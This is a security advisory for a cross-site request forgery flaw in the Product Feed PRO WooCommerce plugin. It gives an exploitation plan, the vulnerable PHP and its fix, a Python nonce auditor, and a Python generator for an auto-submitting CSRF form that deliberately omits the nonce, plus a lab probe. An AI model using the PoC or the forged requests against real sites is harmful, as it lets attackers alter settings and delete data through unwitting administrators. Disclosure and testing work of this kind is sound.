Product Feed PRO for WooCommerce by AdTribes – Product Feeds for WooCommerce 13.4.6 - 13.5.2.1 - Cross-Site Request Forgery to Multiple Administrative Actions
Description
The Product Feed PRO for WooCommerce by AdTribes – Product Feeds for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions 13.4.6 through 13.5.2.1. This is due to missing or incorrect nonce validation on the ajax_migrate_to_custom_post_type, ajax_adt_clear_custom_attributes_product_meta_keys, ajax_update_file_url_to_lower_case, ajax_use_legacy_filters_and_rules, and ajax_fix_duplicate_feed functions. This makes it possible for unauthenticated attackers to trigger feed migration, clear custom-attribute transient caches, rewrite feed file URLs to lowercase, toggle legacy filter and rule settings, and delete duplicated feed posts via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Technical Details
Affected versions: >=13.4.6 <=13.5.2.1
What Changed in the Fix
Changes introduced in v13.5.2.2
Source Code
WordPress.org SVN
Exploitation Research Plan - CVE-2026-3499
1. Vulnerability Summary
The Product Feed PRO for WooCommerce plugin (versions 13.4.6 - 13.5.2.1) is vulnerable to Cross-Site Request Forgery (CSRF). Multiple administrative AJAX handlers fail to implement or correctly validate nonces. This allows an attacker to trick a logged-in administrator into triggering sensitive actions, such as database migrations, clearing caches, altering feed settings, and deleting feed data.
2. Attack Vector Analysis
- Endpoint: /wp-admin/admin-ajax.php
- Actions:
  - woosea_migrate_to_custom_post_type
  - adt_clear_custom_attributes_product_meta_keys
  - woosea_update_file_url_to_lower_case
  - woosea_use_legacy_filters_and_rules
  - woosea_fix_duplicate_feed
- Method: POST
- Authentication Required: none for the attacker; the forged request is submitted by the browser of a logged-in administrator, whose session cookies authenticate it (CSRF).
- Preconditions: A site administrator must be logged in and tricked into visiting a malicious page that submits a request to the target site.
3. Code Flow
- Entry Point: The plugin registers AJAX actions in includes/Classes/Product_Feed_Admin.php (inferred from .pot file references) or a similar admin handler class using add_action( 'wp_ajax_woosea_...', ... ).
- JS Trigger: In includes/Classes/WP_Admin.php, the plugin enqueues woosea_manage.js. This script handles UI buttons on the "Manage Feeds" page.
- Vulnerable Sink: The registered callback functions (e.g., ajax_use_legacy_filters_and_rules) execute administrative logic. In the affected versions the nonce check in these functions is either absent or conditional on the request: it runs only when a 'security' parameter is present, so a request that omits the parameter is never validated (see the vulnerable code quoted on this page).
- Execution: The function performs the action (e.g., update_option( 'adt_use_legacy_filters_and_rules', 'yes' )) without verifying the intent of the user.
4. Nonce Acquisition Strategy
According to the vulnerability description, nonce validation is missing or incorrect.
- Primary Strategy: Attempt the exploit without a nonce. The woosea_manage_params localization in includes/Classes/WP_Admin.php notably lacks a nonce key, suggesting the developers simply didn't include one in the AJAX request data for these specific actions.
- Secondary Strategy (if a nonce is checked but incorrectly): If the handler expects a parameter like security, check if it accepts the generic WordPress REST nonce or a nonce intended for a different action.
- Variable Identification: Check the global adtObj or woosea_manage_params in the browser console.
  - Path: window.woosea_manage_params
5. Exploitation Strategy
We will target the woosea_use_legacy_filters_and_rules action as it provides a clear, verifiable change in the database.
Step-by-Step Exploit (using http_request):
- Identify the Target Action: woosea_use_legacy_filters_and_rules.
- Prepare Payload: Craft a POST request that toggles the legacy filters setting.
- Execute Request:
  - URL: https://[TARGET]/wp-admin/admin-ajax.php
  - Method: POST
  - Headers: Content-Type: application/x-www-form-urlencoded
  - Body: action=woosea_use_legacy_filters_and_rules
  The request reaches the handler's logic only when it carries an administrator's session cookies: the capability check that runs before the nonce check ("You do not have permission to perform this action.") rejects an anonymous request. Against a lab install, send it from the test admin's browser or attach that admin's cookies; in a real CSRF the victim's browser adds them.
- Expected Response: A successful trigger usually returns 1, true, or a JSON success message like {"success":true}.
6. Test Data Setup
- Install Plugin: Install Product Feed PRO for WooCommerce version 13.5.2.1.
- Activate Plugin: Ensure the plugin is active.
- Verify Initial State: Run wp option get adt_use_legacy_filters_and_rules and note whether it is 'no' or the option doesn't exist.
7. Expected Results
- The AJAX request to admin-ajax.php should return a 200 OK status.
- The response body should indicate success (e.g., 1).
- The internal state of the WordPress site (specifically the targeted option) will be modified.
8. Verification Steps
After sending the HTTP request, use WP-CLI to confirm the administrative action was performed:
# Verify the legacy filters toggle
wp option get adt_use_legacy_filters_and_rules
# If targeting fix_duplicate_feed, verify total feed counts (requires setup of duplicates)
wp post list --post_type=adt_product_feed --format=count
9. Alternative Approaches
If woosea_use_legacy_filters_and_rules is patched or behaves differently, target the Duplicate Feed Fixer:
- Action: woosea_fix_duplicate_feed
- Purpose: Deletes duplicate feed posts.
- Verification: Create two feeds with identical names and check if one is deleted after the AJAX call.
If the AJAX handlers require a generic "security" token, attempt to extract it from the "About" page where other AdTribes nonces are often localized:
- wp post create --post_type=page --post_content='[woosea_manage_feeds]' (if the shortcode exists)
- browser_navigate to the created page.
- browser_eval("window.woosea_manage_params") to find any potential tokens.
Summary
Product Feed PRO for WooCommerce (versions 13.4.6 - 13.5.2.1) contains multiple Cross-Site Request Forgery (CSRF) vulnerabilities in its AJAX handlers. The nonce check was optional: the handlers validated the 'security' nonce only when that parameter was explicitly present in the request, so a forged request that simply omits it is never validated. An unauthenticated attacker who lures a logged-in administrator into submitting such a request can trigger administrative actions like toggling settings, clearing caches, or deleting feed data on the administrator's behalf.
Vulnerable Code
// includes/Classes/Usage.php
// Line 759 - Vulnerable pattern where nonce check only triggers if 'security' is present
if ( isset( $_REQUEST['security'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'woosea_ajax_nonce' ) ) {
    wp_send_json_error( __( 'Invalid security token', 'woo-product-feed-pro' ) );
}
---
// Line 789 - Similar vulnerable pattern in another handler
if ( isset( $_REQUEST['security'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'adt_pfp_allow_tracking_nonce' ) ) {
    wp_send_json_error( __( 'Invalid security token', 'woo-product-feed-pro' ) );
}
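A static check for the pattern quoted above, as an added example (Python, written for this page; not the advisory's or the plugin's code). It flags an isset( $_REQUEST[...] ) && ! wp_verify_nonce( ... ) check, which only runs when the parameter is present, and audits every wp_ajax_* registration for a callback that performs no nonce verification at all. The PHP it scans is a constructed sample with hypothetical handler names (adt_example_*), not the plugin's source; the "patched" handler in the sample mirrors the shape of the fix diff.

```python
"""Added example for this page: static audit for optional or missing nonce
checks in WordPress admin-ajax handlers. Not the plugin's code."""
import re

# isset( $_REQUEST['x'] ) && ! wp_verify_nonce( ... ): the verification runs
# only when the parameter is present, so a request that omits it is never checked.
OPTIONAL_NONCE = re.compile(
    r"""isset\s*\(\s*\$_(?:REQUEST|POST|GET)\s*\[\s*['"](?P<param>\w+)['"]\s*\]\s*\)
        \s*&&\s*!\s*wp_verify_nonce\s*\(""",
    re.VERBOSE,
)
# add_action( 'wp_ajax_<action>', array( $this, 'cb' ) | [ $this, 'cb' ] | 'cb' )
REGISTRATION = re.compile(
    r"""add_action\s*\(\s*['"]wp_ajax_(?P<action>\w+)['"]\s*,\s*
        (?:array\s*\(\s*\$this\s*,\s*['"](?P<m1>\w+)['"]\s*\)
          |\[\s*\$this\s*,\s*['"](?P<m2>\w+)['"]\s*\]
          |['"](?P<fn>\w+)['"])""",
    re.VERBOSE,
)
ANY_NONCE_CHECK = re.compile(
    r"\b(?:check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\("
)


def find_optional_nonce_checks(php_source):
    """Return [(line, param)] for every optional-nonce check in the source."""
    return [
        (php_source.count("\n", 0, m.start()) + 1, m.group("param"))
        for m in OPTIONAL_NONCE.finditer(php_source)
    ]


def _function_body(php_source, name):
    """Brace-delimited body of `function name(`, found by counting braces.
    Good enough for plugin code; braces inside strings are not special-cased."""
    m = re.search(r"\bfunction\s+" + re.escape(name) + r"\s*\(", php_source)
    if m is None:
        return None
    start = php_source.find("{", m.end())
    if start == -1:
        return None
    depth = 0
    for i in range(start, len(php_source)):
        if php_source[i] == "{":
            depth += 1
        elif php_source[i] == "}":
            depth -= 1
            if depth == 0:
                return php_source[start:i + 1]
    return None


def audit_ajax_handlers(php_source):
    """Map each wp_ajax_* action to 'optional-nonce', 'no-nonce-check',
    'nonce-checked' or 'callback-not-found'."""
    verdicts = {}
    for m in REGISTRATION.finditer(php_source):
        callback = m.group("m1") or m.group("m2") or m.group("fn")
        body = _function_body(php_source, callback)
        if body is None:
            verdict = "callback-not-found"
        elif OPTIONAL_NONCE.search(body):
            verdict = "optional-nonce"
        elif ANY_NONCE_CHECK.search(body):
            verdict = "nonce-checked"
        else:
            verdict = "no-nonce-check"
        verdicts[m.group("action")] = verdict
    return verdicts


# Constructed PHP sample with hypothetical names, not the plugin's source:
# one handler with the quoted optional check, one with no check, one fixed.
SAMPLE_PHP = r"""<?php
class Example_Ajax {
    public function __construct() {
        add_action( 'wp_ajax_adt_example_optional', array( $this, 'ajax_example_optional' ) );
        add_action( 'wp_ajax_adt_example_none', [ $this, 'ajax_example_none' ] );
        add_action( 'wp_ajax_adt_example_patched', array( $this, 'ajax_example_patched' ) );
    }
    public function ajax_example_optional() {
        if ( isset( $_REQUEST['security'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'woosea_ajax_nonce' ) ) {
            wp_send_json_error( 'Invalid security token' );
        }
        update_option( 'adt_example_flag', 'yes' );
        wp_send_json_success();
    }
    public function ajax_example_none() {
        update_option( 'adt_example_flag', 'no' );
        wp_send_json_success();
    }
    public function ajax_example_patched() {
        if ( ! isset( $_REQUEST['security'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'woosea_ajax_nonce' ) ) {
            wp_send_json_error( 'Invalid security token' );
        }
        update_option( 'adt_example_flag', 'yes' );
        wp_send_json_success();
    }
}
"""

if __name__ == "__main__":
    for action, verdict in audit_ajax_handlers(SAMPLE_PHP).items():
        print(action, verdict)
```

Run it over the plugin's includes/ directory by reading each .php file into audit_ajax_handlers(); the regexes are deliberately loose about whitespace because the quoted code uses WordPress-style spacing inside parentheses. The audit only recognises the three core nonce helpers, so a handler that verifies through a wrapper of its own will show up as no-nonce-check and needs a manual look.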
Security Fix
@@ -756,7 +756,7 @@ wp_send_json_error( array( 'message' => __( 'You do not have permission to perform this action.', 'woo-product-feed-pro' ) ) ); } - if ( isset( $_REQUEST['security'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'woosea_ajax_nonce' ) ) { + if ( ! isset( $_REQUEST['security'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'woosea_ajax_nonce' ) ) { wp_send_json_error( __( 'Invalid security token', 'woo-product-feed-pro' ) ); } @@ -786,7 +786,7 @@ wp_send_json_error( array( 'message' => __( 'You do not have permission to perform this action.', 'woo-product-feed-pro' ) ) ); } - if ( isset( $_REQUEST['security'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'adt_pfp_allow_tracking_nonce' ) ) { + if ( ! isset( $_REQUEST['security'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ), 'adt_pfp_allow_tracking_nonce' ) ) { wp_send_json_error( __( 'Invalid security token', 'woo-product-feed-pro' ) ); }
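Review bot: in the @@ -756 hunk the rewritten condition (`! isset( $_REQUEST['security'] ) || ! wp_verify_nonce( ... )`) does close the omit-the-parameter bypass, but it is still a hand-rolled check that every handler has to repeat correctly. `check_ajax_referer( 'woosea_ajax_nonce', 'security' )` performs the same lookup and verification, dies on failure instead of relying on the surrounding code to stop, and is the form reviewers expect in an admin-ajax handler; if the JSON error body is wanted, pass `false` as its third argument and branch on the return value.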
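Review bot: the @@ -786 hunk is the same conditional again with a different nonce action ('adt_pfp_allow_tracking_nonce'); the original `isset && ! wp_verify_nonce` slip reached both sites because the check was copy-pasted, so the lookup, verification and rejection belong in one helper that takes the action name. Also, the two failure responses in this hunk have different shapes: the permission failure sends array( 'message' => ... ) while the nonce failure sends a bare string, so a client reading data.message sees one and not the other; pick one shape for both.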
Exploit Outline
The exploit targets administrative AJAX handlers via the WordPress admin-ajax.php endpoint.
1. **Identify Target Action**: Select one of the vulnerable AJAX actions, such as `woosea_use_legacy_filters_and_rules` or `woosea_fix_duplicate_feed`.
2. **Craft Forged Request**: Build a POST request to `/wp-admin/admin-ajax.php` with the body `action=woosea_use_legacy_filters_and_rules`.
3. **Omit Nonce**: Crucially, do not include the `security` parameter. Because the vulnerable versions of the plugin only validate the nonce if the `security` parameter exists, omitting it bypasses the validation logic entirely.
4. **Admin Interaction**: Trick a logged-in site administrator into clicking a link or visiting a page that executes the POST request (e.g., via a hidden auto-submitting HTML form).
5. **Result**: The plugin executes the administrative logic, such as toggling the `adt_use_legacy_filters_and_rules` option, without the admin's conscious intent.
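The forged request of sections 2 and 5 and the Exploit Outline above, as an added example (Python, written for this page; not the advisory's or the plugin's code): csrf_poc_html() emits the hidden auto-submitting form the outline describes, with the security field deliberately absent, and probe()/classify() run the differential check a tester would use on a lab install to confirm the optional-nonce behaviour, namely that a request carrying a bogus nonce is rejected with "Invalid security token" while the same request with no nonce at all is not. The target URL, the test admin cookie and the sample JSON bodies are constructed; the action names, the security parameter and the error strings are the ones quoted on this page.

```python
"""Added example for this page: CSRF PoC generator plus a differential probe
for the optional-nonce pattern. Not code from the advisory or the plugin."""
import html
import json
import urllib.error
import urllib.parse
import urllib.request

# AJAX actions named in the advisory; the parameter name and the error
# strings are the ones in the quoted vulnerable code and fix diff.
VULNERABLE_ACTIONS = (
    "woosea_migrate_to_custom_post_type",
    "adt_clear_custom_attributes_product_meta_keys",
    "woosea_update_file_url_to_lower_case",
    "woosea_use_legacy_filters_and_rules",
    "woosea_fix_duplicate_feed",
)
INVALID_TOKEN = "Invalid security token"
NO_PERMISSION = "You do not have permission"


def csrf_poc_html(target_base, action, extra=None):
    """Auto-submitting form that POSTs `action` to admin-ajax.php. It carries
    no 'security' field on purpose: affected versions verify the nonce only
    when that field is present, so omitting it skips the check."""
    if action not in VULNERABLE_ACTIONS:
        raise ValueError(f"not one of the advisory's actions: {action!r}")
    fields = {"action": action}
    fields.update(extra or {})
    if "security" in fields:
        raise ValueError("a CSRF PoC must not send the 'security' field")
    url = target_base.rstrip("/") + "/wp-admin/admin-ajax.php"
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in fields.items()
    )
    return (
        "<!doctype html>\n<html><body>\n"
        f'  <form id="f" method="POST" action="{html.escape(url)}"'
        ' enctype="application/x-www-form-urlencoded">\n'
        f"{inputs}\n  </form>\n"
        "  <script>document.getElementById('f').submit();</script>\n"
        "</body></html>\n"
    )


def _parse_wp_json(body):
    """(success, error_text) for a wp_send_json_success/error body; non-JSON
    bodies (admin-ajax.php itself answers '0' or '1') give (None, None)."""
    try:
        doc = json.loads(body)
    except ValueError:
        return None, None
    if not isinstance(doc, dict) or "success" not in doc:
        return None, None
    if doc["success"]:
        return True, None
    data = doc.get("data")
    if isinstance(data, dict):  # array( 'message' => ... ) form
        data = data.get("message", "")
    return False, str(data)


def classify(no_nonce_body, bad_nonce_body):
    """Classify a handler from its answers to the no-nonce and bad-nonce probes."""
    no_ok, no_err = _parse_wp_json(no_nonce_body)
    bad_ok, bad_err = _parse_wp_json(bad_nonce_body)
    if NO_PERMISSION in (no_err or "") or NO_PERMISSION in (bad_err or ""):
        return "insufficient-privilege"  # probe session is not an admin
    if bad_ok:
        return "vulnerable-no-nonce-check"  # a bogus nonce is accepted
    if bad_err is None or INVALID_TOKEN not in bad_err:
        return "unknown"  # no recognisable nonce check on this handler
    if no_err is not None and INVALID_TOKEN in no_err:
        return "patched"  # a missing nonce is rejected as well
    return "vulnerable-optional-nonce"  # rejected only when the field is present


def probe(target_base, action, cookie_header, timeout=10):
    """Run both probes with the tester's own admin session cookie. Lab use
    only: on a vulnerable target the no-nonce request executes the action."""
    url = target_base.rstrip("/") + "/wp-admin/admin-ajax.php"

    def post(fields):
        req = urllib.request.Request(
            url, data=urllib.parse.urlencode(fields).encode(),
            headers={"Cookie": cookie_header,
                     "Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # error bodies may come with 4xx
            return err.read().decode("utf-8", "replace")

    bad_nonce = post({"action": action, "security": "0" * 10})  # wrong on purpose
    no_nonce = post({"action": action})  # the shape a CSRF form sends
    return classify(no_nonce, bad_nonce)


# Constructed sample bodies (not captured from a real site) in the shapes
# wp_send_json_error()/wp_send_json_success() produce for the quoted code.
SAMPLE_BAD_NONCE = '{"success":false,"data":"Invalid security token"}'
SAMPLE_NO_PERMISSION = ('{"success":false,"data":{"message":'
                        '"You do not have permission to perform this action."}}')
SAMPLE_ACTION_RAN = '{"success":true,"data":{"message":"Setting updated"}}'

if __name__ == "__main__":
    print(classify(SAMPLE_ACTION_RAN, SAMPLE_BAD_NONCE))  # vulnerable-optional-nonce
    print(csrf_poc_html("https://target.example", "woosea_use_legacy_filters_and_rules"))
```

probe() must be run with the tester's own administrator cookie, because the capability check that precedes the nonce check rejects anonymous requests, and it executes the action on a vulnerable target, so use it only against the throwaway install from section 6 and confirm the side effect with the WP-CLI commands of section 8. The bogus-nonce probe goes first so that a "patched" verdict can be reached without the state change ever being attempted on a fixed site.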